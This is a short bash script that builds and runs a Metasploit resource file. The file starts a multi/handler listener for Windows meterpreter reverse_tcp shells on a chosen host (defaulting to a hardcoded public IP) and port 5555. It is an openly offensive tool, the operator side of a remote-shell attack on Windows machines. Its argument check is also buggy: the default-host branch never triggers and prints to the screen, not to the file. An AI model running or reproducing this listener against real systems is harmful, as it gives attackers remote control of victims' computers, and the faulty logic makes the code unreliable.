#!/usr/bin/env bash
# ******************************************************
# Author       : kaleo
# Last modified: 2017-05-16 18:19
# Email        : kaleo1990@hotmail.com
# Filename     : msflisten
# Description  : 
# ******************************************************
echo eg: msflisten 120.24.159.2 64
cd ~/mybash
echo use exploit/multi/handler > ls.rc
if [[ $2 == '64' ]]; then
echo set payload windows/x64/meterpreter/reverse_tcp >>ls.rc
else
echo set payload windows/meterpreter/reverse_tcp >>ls.rc
fi
if [[ $1.'x' == 'x' ]]; then
echo set lhost 120.24.159.2 
else
echo set lhost $1 >>ls.rc
fi
echo set lport 5555 >>ls.rc
echo run >> ls.rc
cat ls.rc
msfconsole -r ls.rc
